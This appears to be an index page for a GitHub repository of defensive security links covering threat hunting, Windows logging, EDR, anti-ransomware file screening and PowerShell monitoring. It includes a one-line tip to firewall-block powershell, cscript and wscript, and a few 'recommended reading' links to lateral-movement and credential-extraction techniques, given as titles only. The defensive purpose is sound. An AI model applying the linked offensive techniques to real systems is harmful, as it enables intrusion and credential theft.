Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/mhaggis/hunt-detect-prevent
Lists of sources and utilities utilized to hunt, detect and prevent evildoers.
https://github.com/mhaggis/hunt-detect-prevent
hunt microsoft powershell
Last synced: about 2 months ago
JSON representation
Lists of sources and utilities utilized to hunt, detect and prevent evildoers.
- Host: GitHub
- URL: https://github.com/mhaggis/hunt-detect-prevent
- Owner: MHaggis
- License: gpl-3.0
- Created: 2017-01-11T07:13:13.000Z (almost 8 years ago)
- Default Branch: master
- Last Pushed: 2018-12-10T15:57:21.000Z (about 6 years ago)
- Last Synced: 2024-10-28T21:37:20.393Z (about 2 months ago)
- Topics: hunt, microsoft, powershell
- Language: PowerShell
- Size: 2 MB
- Stars: 161
- Watchers: 23
- Forks: 41
- Open Issues: 2
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# hunt-detect-prevent
Lists of sources and utilities to hunt, detect and prevent evildoers.
# Hunt, Detect & Prevent -- Resources
**AD Security**
https://jimshaver.net/2016/02/14/defending-against-mimikatz/
https://adsecurity.org/?p=559
**Microsoft EMET**
https://support.microsoft.com/en-us/kb/2458544
**Microsoft ATA**
https://blogs.technet.microsoft.com/enterprisemobility/2016/12/12/will-advanced-threat-analytics-help-me-with-non-windows-oss/
**Microsoft File Screening**
http://olivermarshall.net/using-file-screening-to-help-block-cryptolocker/
http://blog.netwrix.com/2016/04/11/ransomware-protection-using-fsrm-and-powershell/
**Threat Hunting**
https://github.com/ThreatHuntingProject/ThreatHunting
**Powershell**
Log hunting with powershell
http://909research.com/windows-log-hunting-with-powershell/
https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf
https://isc.sans.edu/diary/21829
- powershell blocked via windows firewall (same for cscript/wscript)POSH to read event logs
- http://www.tinyurl.com/504extra2https://files.sans.org/summit/DFIR_Summit_Prague_2016/PDFs/PowerShell-obFUsk8tion-Techniques-David-Bohannon.pdf
https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
**Windows event forwarding**
https://blogs.technet.microsoft.com/russellt/2017/05/09/project-sauron-introduction/
https://blogs.technet.microsoft.com/jepayne/2015/11/23/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem/
http://909research.com/sysmon-the-best-free-windows-monitoring-tool-you-arent-using/
https://blogs.technet.microsoft.com/wincat/2008/08/11/quick-and-dirty-large-scale-eventing-for-windows/
**EDR**
CarbonBlack
limacharlie
OSQuery
**Logging**
Logging debrief--
https://www.malwarearchaeology.com/logging/
[ELK](https://www.elastic.co/products)
[Graylog](https://www.graylog.org/)
[Splunk](https://www.splunk.com/)
[alienvault](https://www.alienvault.com/)
**SCCM**
https://www.fireeye.com/blog/threat-research/2016/12/do_you_see_what_icc.html
https://github.com/PowerShellMafia/PowerSCCM
**Recommended reading:**
https://github.com/subTee
https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
http://seclist.us/powermemory-v1-4-exploit-the-credentials-present-in-files-and-memory.html